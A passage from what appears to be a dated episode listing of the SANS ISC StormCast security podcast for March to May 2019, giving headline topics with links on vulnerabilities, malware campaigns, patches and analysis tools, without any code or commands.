Office Document And Base64 Encoded PowerShell Script https://isc.sans.edu/forums/diary/Office+Document+BASE64+PowerShell/24976/ https://0xdf.gitlab.io/2019/05/21/malware-analysis-unnamed-emotet-doc.html
Enumeration of BlueKeep Vulnerable Hosts https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html
DHCP Client Vulnerability Analysis https://sensepost.com/blog/2019/analysis-of-a-1day-cve-2019-0547-and-discovery-of-a-forgotten-condition-in-the-patch-cve-2019-0726-part-1-of-2/
Office File Deletion Phishing Emails https://www.bleepingcomputer.com/news/security/phishing-emails-pretend-to-be-office-365-file-deletion-alerts/
5/29/2019 - 5 minutes, 57 seconds

ISC StormCast for Tuesday, May 28th 2019

MacOS GateKeeper Bypass https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass
Fortinet FortiOS SSL VPN Vulnerabilities https://fortiguard.com/psirt
Customizing NMAP Service Detection https://isc.sans.edu/forums/diary/Video+nmap+Service+Detection+Customization/24970/
5/28/2019 - 5 minutes, 45 seconds

ISC StormCast for Friday, May 24th 2019

Dangers of Custom URL Schemes https://zeropwn.github.io/2019-05-22-fun-with-uri-handlers/
Update on Physical Skimmer Market https://www.advanced-intel.com/blog/skimming-threat-landscape-technology-advances-lower-barriers-of-entry-for-novice-skimming-operators
Apple Supplemental Update For macOS 10.14.5 https://support.apple.com/kb/DL2005?locale=en_US
Microsoft Releases Advanced Threat Protection for MacOS https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Microsoft-Defender-ATP-for-Mac-now-in-open-public-preview/ba-p/634603
5/24/2019 - 6 minutes, 5 seconds

ISC StormCast for Thursday, May 23rd 2019

An Update on the Microsoft Windows RDP BlueKeep Vulnerability https://isc.sans.edu/forums/diary/An+Update+on+the+Microsoft+Windows+RDP+Bluekeep+Vulnerability+CVE20190708+now+with+pcaps/24960/
New Zero Day Exploits by SandboxEscaper https://github.com/SandboxEscaper/polarbearrepo
Signed Exploit Code https://medium.com/@chroniclesec/abusing-code-signing-for-profit-ef80a37b50f4
5/22/2019 - 6 minutes, 18 seconds

ISC StormCast for Wednesday, May 22nd 2019

Setting Up Shodan Monitoring https://isc.sans.edu/forums/diary/Using+Shodan+Monitoring/24956/
Fingerprinting Smartphones With Gyroscope Data https://sensorid.cl.cam.ac.uk/
20% of Linux Docker Containers Without Password https://www.kennasecurity.com/20-of-the-1000-most-popular-docker-containers-have-no-root-password/
RDP #bluekeep Signature For Snort/Suricata https://github.com/nccgroup/Cyber-Defence/blob/master/Signatures/suricata/2019_05_rdp_cve_2019_0708.txt
5/21/2019 - 5 minutes, 32 seconds

ISC StormCast for Tuesday, May 21st 2019

MSFT RDP Vulnerability (#BlueKeep) Update https://twitter.com/search?q=%23bluekeep
Sharepoint Exploited https://isc.sans.edu/forums/diary/CVE20190604+Attack/24952/
Risks of JWT https://snikt.net/blog/2019/05/16/jwt-signature-vs-mac-attacks/
MuddyWater Campaign Evolves https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html
5/20/2019 - 5 minutes, 19 seconds

ISC StormCast for Monday, May 20th 2019

Google Analyzes Vendor Response to 0-Day Exploits https://googleprojectzero.blogspot.com/p/0day.html
ASUS WebStorage Abused For Malware Distribution https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/
Vulnerabilities in Apple AirDrop https://www.usenix.org/system/files/sec19fall_stute_prepub.pdf
5/19/2019 - 5 minutes, 38 seconds

ISC StormCast for Friday, May 17th 2019

The Risk of Authenticated Vulnerability Scans https://isc.sans.edu/forums/diary/The+Risk+of+Authenticated+Vulnerability+Scans/24942/
ARIN Revokes about 735,000 IP Addresses https://www.arin.net/vault/about_us/media/releases/20190513.html
More Cisco Patches (Prime Infrastructure, EPN Manager) https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
Instrument Landing Systems Spoofing https://aanjhan.com/assets/ils_usenix2019.pdf
5/17/2019 - 6 minutes, 1 second

ISC StormCast for Thursday, May 16th 2019

Forbes Website Infected by Magecart https://twitter.com/bad_packets/status/1128517905765683201
Malware Randomizes TLS Ciphers https://blogs.akamai.com/sitr/2019/05/bots-tampering-with-tls-to-avoid-detection.html
Google Recalls Titan Security Keys https://security.googleblog.com/2019/05/titan-keys-update.html
SAMBA Update https://www.samba.org/samba/security/CVE-2018-16860.html
SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=520259032
5/16/2019 - 5 minutes, 12 seconds

ISC StormCast for Wednesday, May 15th 2019

New Intel CPU Vulnerabilities https://cpu.fail/
Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2019+Patch+Tuesday/24934/
Apple Updates https://support.apple.com/en-us/HT201222
Broken Trustseal https://twitter.com/gwillem/status/1127890329175244800 https://twitter.com/bestoftheweb/status/1128036593208524800
5/15/2019 - 6 minutes, 14 seconds

ISC StormCast for Tuesday, May 14th 2019

Linux Remote Code Execution When Closing TCP Sockets https://github.com/torvalds/linux/commit/cb66ddd156203daefb8d71158036b27b0e2caf63
WhatsApp Buffer Overflow Exploited to Install Spyware https://www.facebook.com/security/advisories/cve-2019-3568
Cisco Vulnerabilities Lead to Trust Anchor Module Exploit https://thrangrycat.com/
Linksys Unauthenticated Information Leak https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/
5/14/2019 - 5 minutes, 33 seconds

ISC StormCast for Monday, May 13th 2019

DSSuite - A Docker Container with Didier's Tools https://isc.sans.edu/forums/diary/DSSuite+A+Docker+Container+with+Didiers+Tools/24926/
Sqlite3 Vulnerability https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0777
NVidia Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4797
Windows 10 FIDO2 Certified https://fidoalliance.org/microsoft-achieves-fido2-certification-for-windows-hello/
Google May Remove ADB Backup/Restore from Future Android Versions https://www.xda-developers.com/adb-backup-and-restore-depreciated/
5/13/2019 - 5 minutes, 9 seconds

ISC StormCast for Friday, May 10th 2019

US DHS Warns of North Korean ELECTRICFISH Malware https://www.us-cert.gov/ncas/analysis-reports/AR19-129A
Fake KeePass Site Spreading Malware https://twitter.com/berkcgoksel/status/1125727590440931329
Google Android Security Bulletin https://source.android.com/security/bulletin/2019-05-01
Three Anti-Virus Companies Breached https://www.advanced-intel.com/blog/top-tier-russian-hacking-collective-claims-breaches-of-three-major-anti-virus-companies
5/10/2019 - 5 minutes, 33 seconds

ISC StormCast for Thursday, May 9th 2019

Email Roulette May 2019 https://isc.sans.edu/forums/diary/Email+roulette+May+2019/24918/
Turla LightNeuron https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
Alpine Linux Docker Image root User Hard Coded Credentials https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782
WordPress 5.2 Adds Digitally Signed Updates https://wordpress.org/support/wordpress-version/version-5-2/
5/9/2019 - 5 minutes, 45 seconds

ISC StormCast for Wednesday, May 8th 2019

Jenkins Exploit Mines Cryptocurrencies https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916/
Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/
Cisco Elastic Services Controller REST API Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190507-esc-authbypass
Google Chrome History Manipulation Prevention https://groups.google.com/a/chromium.org/forum/?#!msg/blink-dev/T8d4_BRb2xQ/WSdOiOFcBAAJ
5/8/2019 - 4 minutes, 59 seconds

ISC StormCast for Tuesday, May 7th 2019

Decoding UTF-16 in UDF Files https://isc.sans.edu/forums/diary/Text+and+TNULeNULxNULtNUL/24912/
VMWare Fusion 11 Guest VM RCE https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/
Hackers Are Using Bad Passwords Too https://www.ankitanubhav.info/post/c2bruting
Amazon S3 Discontinues Path Style Access https://www.bleepingcomputer.com/news/security/amazon-to-disable-s3-path-style-access-used-to-bypass-censorship/
5/7/2019 - 6 minutes, 11 seconds

ISC StormCast for Monday, May 6th 2019

Git Ransomware https://www.theregister.co.uk/2019/05/03/git_ransomware_bitcoin/
DLink Ransomware Patch https://eu.dlink.com/de/de/support/support-news/2019/february/28/dns320_trojan_cr1pttor
Jenkins Plugin Vulnerabilities https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/may/story-of-a-hundred-vulnerable-jenkins-plugins/
Malicious WPAD Domains https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html
5/5/2019 - 6 minutes, 32 seconds

ISC StormCast for Friday, May 3rd 2019

New SAP Exploits Used to Target Exposed https://www.onapsis.com/10kblaze
Cisco Patches SSH Default Credential Vulnerability in Nexus 9000 Switches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-sshkey
Current State of JavaScript Crypto Jacking https://blog.malwarebytes.com/cybercrime/2019/05/cryptojacking-in-the-post-coinhive-era/
D-Link Camera Vulnerabilities https://www.welivesecurity.com/2019/05/02/d-link-camera-vulnerability-video-stream/
Securepairs Promotes "Right to Repair" https://securepairs.org/
5/3/2019 - 6 minutes, 8 seconds

ISC StormCast for Thursday, May 2nd 2019

RCE Vulnerability in Dell Support Assist https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/
Crestron Multiple Vulnerabilities https://www.crestron.com/en-US/Security/Security_Advisories
Polymorphic Skimmer Targeting 57 Different Payment Gateways https://labs.sansec.io/2019/04/29/polymorphic-skimmer-57-payment-gateways/
More Attacks Against S/MIME and PGP Signed Email https://github.com/RUB-NDS/Johnny-You-Are-Fired/blob/master/paper/johnny-fired.pdf
5/2/2019 - 5 minutes, 57 seconds

ISC StormCast for Wednesday, May 1st 2019

Sodinokibi Ransomware Exploits WebLogic Server Vulnerability https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
Facebook Leaking Sellers' Exact Locations https://www.7elements.co.uk/resources/blog/facebooks-burglary-shopping-list/
Revive Adserver Deserialization Vulnerability https://www.revive-adserver.com/security/revive-sa-2019-001/
AutoMacTC: Automating Mac Forensics Triage https://www.crowdstrike.com/blog/automating-mac-forensic-triage/
Kroll Artifact Parser And Extractor (KAPE) https://learn.duffandphelps.com/kape
5/1/2019 - 5 minutes, 37 seconds

ISC StormCast for Tuesday, April 30th 2019

iLnkP2P Allows Access To Millions of Security Cameras https://hacked.camera
Windows 10 Users Not Applying October Update https://reports.adduplex.com/#/r/2019-04
iFrame "Ransom Support" Attacks https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/
4/30/2019 - 5 minutes, 51 seconds

ISC StormCast for Monday, April 29th 2019

WebLogic Update https://isc.sans.edu/diary.html?storyid=24890
Docker Hub Breach https://success.docker.com/article/docker-hub-user-notification
4/29/2019 5 minutes, 18 seconds

ISC StormCast for Friday, April 26th 2019

Unpatched Vulnerability in WebLogic Exploited https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/
Collecting Windows Service Accounts https://isc.sans.edu/forums/diary/Service+Accounts+Redux+Collecting+Service+Accounts+with+PowerShell/24882/
Confluence Vulnerability Exploited by GandCrab https://blog.alertlogic.com/active-exploitation-of-confluence-vulnerability-cve-2019-3396-dropping-gandcrab-ransomware/
New Microsoft Security Baseline for Windows 10 / Windows Server https://blogs.technet.microsoft.com/secguide/2019/04/24/security-baseline-draft-for-windows-10-v1903-and-windows-server-v1903/
4/26/2019 5 minutes, 25 seconds

ISC StormCast for Thursday, April 25th 2019

Rooting Out Unwanted Domain Admins With PowerShell https://isc.sans.edu/forums/diary/Where+have+all+the+Domain+Admins+gone+Rooting+out+Unwanted+Domain+Administrators/24874/
Mac OS XProtect Now Covering Windows Malware https://twitter.com/patrickwardle/status/1120771284286103552
WiFi Finder Leaks Hotspot Passwords https://techcrunch.com/2019/04/22/hotspot-password-leak/
GitHub Hosting Phishing Pages https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits
RSA Webinar: The Five Most Dangerous New Attack Techniques and How to Counter Them https://www.rsaconference.com/videos/rsac-2019-the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them-continued
4/25/2019 7 minutes, 28 seconds

ISC StormCast for Wednesday, April 24th 2019

Decoding Malicious VBA Office Document Without Source Code https://isc.sans.edu/forums/diary/Malicious+VBA+Office+Document+Without+Source+Code/24870/
More Updates on "ShadowHammer" Supply Chain Attack https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/
A Malicious Sight in Google Sites https://www.netskope.com/blog/malicious-google-sites
4/24/2019 5 minutes, 47 seconds

ISC StormCast for Tuesday, April 23rd 2019

.rar Files Exploiting ACE Vulnerability CVE-2018-20250 https://isc.sans.edu/forums/diary/rar+Files+and+ACE+Exploit+CVE201820250/24864/
Malware Senders Become Younger and Less Sophisticated (in German) https://www.heise.de/security/meldung/Malware-Verteiler-werden-immer-juenger-infizieren-sich-oft-selbst-4403823.html
McAfee Antivirus Affected by April Windows Update Crashes http://kc.mcafee.com/corporate/index?page=content&id=KB91465
Rules to Protect Against Azure Blog Phishing in Outlook 365 https://malware-research.org/simple-rule-to-protect-against-spoofed-windows-net-phishing-attacks/
Windows 7 End of Support Messages https://www.windowslatest.com/2019/04/20/windows-7-users-are-now-receiving-the-end-of-support-notifications/
4/22/2019 5 minutes, 44 seconds

ISC StormCast for Monday, April 22nd 2019

Analyzing UDF Files Using Python https://isc.sans.edu/forums/diary/Analyzing+UDF+Files+with+Python/24860/
HTML Ping To Be Adopted By All Major Browsers https://webkit.org/blog/8821/link-click-analytics-and-privacy/
Microsoft to Modify Edge User Agent for Some Sites https://www.onmsft.com/news/new-edge-insider-browser-can-change-user-agent-strings-based-on-what-website-youre-visiting
French Government Chat System Used Weak User Management https://m.heise.de/security/meldung/Tchap-Frankreichs-nicht-so-exklusiver-Regierungschat-4403961.html
4/22/2019 6 minutes, 53 seconds

ISC StormCast for Friday, April 19th 2019

Malware Delivered As a UDF .img File https://isc.sans.edu/forums/diary/Malware+Sample+Delivered+Through+UDF+Image/24854/
Facebook Stored Passwords in Plain Text https://newsroom.fb.com/news/2019/03/keeping-passwords-secure/
Iranian State-sponsored Malware and Data Leaked https://misterch0c.blogspot.com/2019/04/apt34-oilrig-leak.html
Windows 8 Live Tiles Domain Takeover https://www.golem.de/news/subdomain-takeover-microsoft-verliert-kontrolle-ueber-windows-kacheln-1904-140709.html
4/19/2019 6 minutes, 50 seconds

ISC StormCast for Thursday, April 18th 2019

DNS Hijacking by Sea Turtle https://blog.talosintelligence.com/2019/04/seaturtle.html
Broadcom WiFi Driver Vulnerabilities https://www.kb.cert.org/vuls/id/166939/
NamPoHyu Virus Infects Samba Servers https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/
Increased Attacks on Confluence https://twitter.com/DFNCERT/status/1118468599230943233
4/18/2019 5 minutes, 28 seconds

ISC StormCast for Wednesday, April 17th 2019

PoC Exploit for Windows 10 DHCP Client Vulnerability CVE-2019-0726 (in Russian) https://habr.com/ru/company/pt/blog/448378/
Oracle April 2019 Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
Wipro Breached Via Phishing Attacks https://krebsonsecurity.com/2019/04/experts-breach-at-it-outsourcing-giant-wipro/
IDA and Ghidra Part 2 (Strings And Parameters) https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+2+strings+and+parameters/24848/
4/17/2019 5 minutes, 34 seconds

ISC StormCast for Tuesday, April 16th 2019

Common "False Positives" in DNS Query Logs https://isc.sans.edu/forums/diary/Odd+DNS+Requests+that+are+Normal/24844/
Adblock Plus Allows Filter List Providers to Inject Code in Pages https://armin.dev/blog/2019/04/adblock-plus-code-injection/
Executables in Polyglot DICOM Images https://github.com/d00rt/pedicom/blob/master/doc/Attacking_Digital_Imaging_and_Communication_in_Medicine_(DICOM)_file_format_standard_-_Markel_Picado_Ortiz_(d00rt).pdf
Malicious/Misleading VPN Ads https://www.bleepingcomputer.com/news/security/mobile-vpns-promoted-by-you-are-infected-or-hacked-ads/
4/16/2019 7 minutes, 4 seconds

ISC StormCast for Monday, April 15th 2019

Configuring MTA-STS https://isc.sans.edu/forums/diary/Configuring+MTASTS+and+TLS+Reporting+For+Your+Domain/24840/
How to Find Hidden Cameras in Your AirBNB https://isc.sans.edu/forums/diary/How+to+Find+Hidden+Cameras+in+your+AirBNB/24834/
Insecure Storage of VPN Credentials https://www.kb.cert.org/vuls/id/192371/
Microsoft Patch Problems https://support.microsoft.com/en-us/help/4493472/windows-7-update-kb4493472 https://support.microsoft.com/en-us/help/4493446/windows-8-1-update-kb4493446
Internet Explorer XML External Entity Vulnerability http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
4/15/2019 6 minutes, 24 seconds

ISC StormCast for Friday, April 12th 2019

Gmail Will Be Supporting MTA-STS and SMTP TLS Reporting https://tools.ietf.org/html/rfc8461 https://tools.ietf.org/html/rfc8460 https://www.zdnet.com/article/gmail-becomes-first-major-email-provider-to-support-mta-sts-and-tls-reporting/
Juniper Patch Fixes Static Password in Junos OS https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10923&actp=METADATA
Uniden Commercial IP Camera Site Hosting Malware https://twitter.com/JayTHL/status/1116200014630596609
4/12/2019 6 minutes, 16 seconds

ISC StormCast for Thursday, April 11th 2019

WPA3 Dragonblood Vulnerability http://papers.mathyvanhoef.com/dragonblood.pdf
North Korean Trojan: HOPLIGHT https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Gaza Cybergang Group1 "SneakyPastes" https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/
4/11/2019 7 minutes, 37 seconds

ISC StormCast for Wednesday, April 10th 2019

Microsoft and Adobe Patches https://isc.sans.edu/forums/diary/Microsoft+April+2019+Patch+Tuesday/24826/ https://helpx.adobe.com/security.html
Fake "Food Poisoning" Emails in Germany (in German) https://www.polizei-praevention.de/aktuelles/erneut-mails-mit-schadsoftware-gegen-gewerbetreibende-im-umlauf.html
Vulnerability in Apache Axis https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/
Golang DLL Injection Vulnerability https://www.openwall.com/lists/oss-security/2019/04/09/1
4/9/2019 6 minutes, 41 seconds

ISC StormCast for Tuesday, April 9th 2019

Ghidra vs. IDA https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+1+the+decompilerunreachable+code/24822/
Trend Micro Patch https://success.trendmicro.com/solution/1122250
Dovecot Patch https://dovecot.org/list/dovecot-news/2019-March/000403.html
Apache CVE-2019-0211 Exploit https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache
Using JavaScript in Exploits https://www.youtube.com/watch?v=HfpnloZM61I
4/9/2019 5 minutes, 33 seconds

ISC StormCast for Monday, April 8th 2019

Fake Office 365 Invoices Spread Ransomware https://isc.sans.edu/forums/diary/Fake+Office+365+Payment+Information+Update/24818/
Malware Hiding in .well-known Directory https://www.zscaler.com/blogs/research/abuse-hidden-well-known-directory-https-sites
Altering CT Images to Manipulate Diagnosis https://arxiv.org/pdf/1901.03597.pdf
Qt Framework RCE Vulnerability https://www.zerodayinitiative.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739
4/7/2019 6 minutes, 47 seconds

ISC StormCast for Friday, April 5th 2019

New Waves of Scans Detected By An Old Rule https://isc.sans.edu/forums/diary/New+Waves+of+Scans+Detected+by+an+Old+Rule/24812/
Xiaomi Guard App Vulnerable to Man in the Middle https://blog.checkpoint.com/2019/04/04/xiaomi-vulnerability-when-security-is-not-what-it-seems/
Xwo Web Scanner Hunting for MongoDB https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner
Vulnerable Smartwatches "Defaced" https://api.heise.de/svc/embetty/tweet/1112326532939374593-images-0 https://www.heise.de/newsticker/meldung/Vidimensio-Smartwatches-Der-Sicherheits-Alptraum-geht-weiter-4359967.html
4/4/2019 5 minutes, 47 seconds

ISC StormCast for Thursday, April 4th 2019

Ghidra Tips for IDA Users: Automatic Comments for API Call Parameters https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+0+automatic+comments+for+API+call+parameters/24806/
Security Awareness Newsletter: Making Passwords Simple https://www.sans.org/security-awareness-training/resources/making-passwords-simple
IRS Themed Phishing Emails https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-target-2019-filers
Large Leak of Facebook User Data via 3rd Party App https://www.upguard.com/breaches/facebook-user-data-leak
Arbitrary Command Execution in PostgreSQL https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
4/4/2019 5 minutes, 47 seconds

ISC StormCast for Wednesday, April 3rd 2019

Compromised LaCie Drives Spread Fake AntiVirus https://isc.sans.edu/forums/diary/Fake+AV+is+Back+LaCie+Network+Drives+Used+to+Spread+Malware/24802/
Unpatched SOP Vulnerability in Internet Explorer/Edge https://thehackernews.com/2019/03/microsoft-edge-ie-zero-days.html
Apache Fixes Privilege Escalation Flaw https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2019-0211
Verizon Users Phished for Credentials https://blog.lookout.com/mobile-phishing-verizon
4/3/2019 5 minutes, 21 seconds

ISC StormCast for Tuesday, April 2nd 2019

Common "OpenAction" False Positive in PDFs Created by OpenOffice https://isc.sans.edu/forums/diary/Analysis+of+PDFs+Created+with+OpenOfficeLibreOffice/24798/
Android Monthly Update https://source.android.com/security/bulletin/2019-04-01#2019-04-01-details
Malicious Android App Forwards Banking Calls to Attacker https://www.blackhat.com/asia-19/briefings/schedule/index.html#when-voice-phishing-met-malicious-android-app-13419
Google Allowing WebAuthn Login from Firefox/Edge https://twitter.com/christiaanbrand/status/1111430192596025347
All Your Data Are Belong to Us: Defending Against Credential Stuffing Attacks https://www.sans.org/webcasts/data-belong-us-defend-credential-stuffing-110340
4/2/2019 4 minutes, 38 seconds

ISC StormCast for Monday, April 1st 2019

Annotating Golang Binaries with Cutter and Jupyter https://isc.sans.edu/forums/diary/Annotating+Golang+binaries+with+Cutter+and+Jupyter/24790/
ASUS Targeted MAC Addresses Available for Download https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/
Weaponized Version of New Zealand Attack Manifesto https://bluehexagon.ai/blog/weaponized-version-of-new-zealand-terror-suspects-manifesto-discovered-in-the-wild/
Kubernetes Directory Traversal https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/
VMware Patches https://www.vmware.com/security/advisories/VMSA-2019-0005.html
3/31/2019 5 minutes, 36 seconds

ISC StormCast for Friday, March 29th 2019

Creating Your Own Passive DNS Logs https://isc.sans.edu/forums/diary/Running+your+Own+Passive+DNS+Service/24784/
Incomplete Patch for Cisco RV320 Routers https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-003/-cisco-rv320-unauthenticated-configuration-export https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-004/-cisco-rv320-unauthenticated-diagnostic-data-retrieval
TP-Link Debug Port Vulnerability https://twitter.com/mjg59/status/1111106885736787975 https://pastebin.com/GAzccR95
3/28/2019 4 minutes, 30 seconds

ISC StormCast for Thursday, March 28th 2019

Microsoft Releases Application Guard for Firefox and Chrome https://blogs.windows.com/windowsexperience/2019/03/15/announcing-windows-10-insider-preview-build-18358/
New Set of LTE Vulnerabilities https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf
NVIDIA Privilege Escalation https://rhinosecuritylabs.com/application-security/nvidia-arbitrary-file-writes-to-command-execution-cve-2019-5674/
3/27/2019 5 minutes, 5 seconds

ISC StormCast for Wednesday, March 27th 2019

Apple Updates https://support.apple.com/en-us/HT201222
ASUS Response to Kaspersky Report https://www.asus.com/News/hqfgVUyZ6uyAyJe1
Firefox Importing Windows Root Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1533397
UC Web Browser MITM Vulnerability https://www.bleepingcomputer.com/news/security/uc-browser-for-android-desktop-exposes-500-million-users-to-mitm-attacks/
3/26/2019 5 minutes, 40 seconds

ISC StormCast for Tuesday, March 26th 2019

ASUS Live Update "ShadowHammer" Backdoor https://www.kaspersky.com/blog/shadow-hammer-teaser https://shadowhammer.kaspersky.com/
Telegram Unsend Feature https://techcrunch.com/2019/03/25/going-going-gone/
F5 BIG-IP Updates https://support.f5.com/csp/article/K14812883
3/25/2019 5 minutes, 19 seconds

ISC StormCast for Monday, March 25th 2019

Reversing Malware Written In Golang https://isc.sans.edu/forums/diary/Introduction+to+analysing+Go+binaries/24770/
More "VelvetSweatshop" Maldocs https://isc.sans.edu/forums/diary/VelvetSweatshop+Maldocs/24772/
Reading QR Codes in Python https://isc.sans.edu/forums/diary/Decoding+QR+Codes+with+Python/24774/
Pwn2Own Contest: Firefox, Safari, Edge and Others Fall https://www.zdnet.com/article/tesla-car-hacked-at-pwn2own-contest/
Norwegian Nokia Phones Sent Data to China (Article in Norwegian) https://nrkbeta.no/2019/03/21/norske-telefoner-sendte-personopplysninger-til-kina/
Java Card Vulnerabilities https://seclists.org/fulldisclosure/2019/Mar/35
3/24/2019 6 minutes, 8 seconds

ISC StormCast for Thursday, March 21st 2019

Google Photos Cross-Site Leak Exposes Picture Metadata https://www.imperva.com/blog/now-patched-google-photos-vulnerability-let-hackers-track-your-friends-and-location-history/
Fake CDC Emails Spread GandCrab Ransomware https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/
Atlassian Sourcetree Vulnerability https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html
Microsoft Defender for macOS https://www.theregister.co.uk/2019/03/21/microsoft_defender_atp/
3/21/2019 5 minutes, 29 seconds

ISC StormCast for Wednesday, March 20th 2019

Using Active Directory (AD) To Find Hosts That Are Not in AD https://isc.sans.edu/forums/diary/Using+AD+to+find+hosts+that+arent+in+AD+fun+with+the+IPAddress+construct/24762/
Microsoft Anti Malware Crashing Windows https://social.technet.microsoft.com/Forums/en-US/18ab60a3-3b26-4a07-b68d-84085ce66ce5/scep-crashing-pcs?forum=ConfigMgrCompliance&prof=required
Reduction in DDoS Attacks https://www.nexusguard.com/threat-report-q4-2018
3/20/2019, 5 minutes, 40 seconds

ISC StormCast for Wednesday, March 20th 2019

Cloudflare Releases Proxy Detection Tools https://blog.cloudflare.com/monsters-in-the-middleboxes/
Business Email Compromise Moving to SMS https://www.agari.com/email-security-blog/bec-goes-mobile/
JavaScript Requests Without Same Origin Policy Limitations https://www.forcepoint.com/blog/security-labs/attacking-internal-network-public-internet-using-browser-proxy
Discovering IPv6 Hosts With UPNP https://blog.talosintelligence.com/2019/03/ipv6-unmasking-via-upnp.html#more
3/19/2019, 6 minutes, 7 seconds

ISC StormCast for Monday, March 18th 2019

Putty Updates https://www.chiark.greenend.org.uk/~sgtatham/putty/
Fujitsu Wireless Keyboard Vulnerabilities https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-033.txt
Signed Malware Goes Undetected https://twitter.com/malwrhunterteam/status/1104082562216062978/photo/1?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1104082562216062978&ref_url=https%3A%2F%2Fwww.theregister.co.uk%2F2019%2F03%2F18%2Fsecurity_roundup_150319%2F
Free Support for Ubuntu 14.04 LTS Ends in April https://lists.ubuntu.com/archives/ubuntu-announce/2019-March/000241.html
Latest Mirai Version with Even More Exploits https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/
3/18/2019, 5 minutes, 41 seconds

ISC StormCast for Sunday, March 17th 2019

Binary Analysis With Jupyter and Radare2 https://isc.sans.edu/forums/diary/Binary+Analysis+with+Jupyter+and+Radare2/24748/
IMAP Brute Forcing against Cloud Accounts https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-credential-dumps-phishing-and-legacy-email-protocols
Google Allows GSuite Users to Disable SMS/Voice Authentication https://gsuiteupdates.googleblog.com/2019/03/more-control-over-2-step-verification-security-phone-sms.html
Sniffing Bitlocker Keys from TPM https://pulsesecurity.co.nz/articles/TPM-sniffing
3/17/2019, 7 minutes, 2 seconds

ISC StormCast for Friday, March 15th 2019

Analyzing ZIP Files in Ghidra https://isc.sans.edu/forums/diary/Tip+Ghidra+ZIP+Files/24732/
64 Bit Certificate Serial Number Revocation https://adamcaudill.com/2019/03/09/tls-64bit-ish-serial-numbers-mass-revocation/
Cisco Default Account Problem https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190313-cspcscv
Intel Patches https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00185.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00191.html
3/15/2019, 5 minutes, 13 seconds

ISC StormCast for Wednesday, March 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2019+Patch+Tuesday/24742/
Adobe Updates https://helpx.adobe.com/security.html
PSMiner https://blog.360totalsecurity.com/en/new-mining-worm-psminer-uses-multiple-high-risk-vulnerabilities-to-spread/
Automatic Certificate Management Environment https://tools.ietf.org/html/rfc8555
3/13/2019, 6 minutes, 10 seconds

ISC StormCast for Tuesday, March 12th 2019

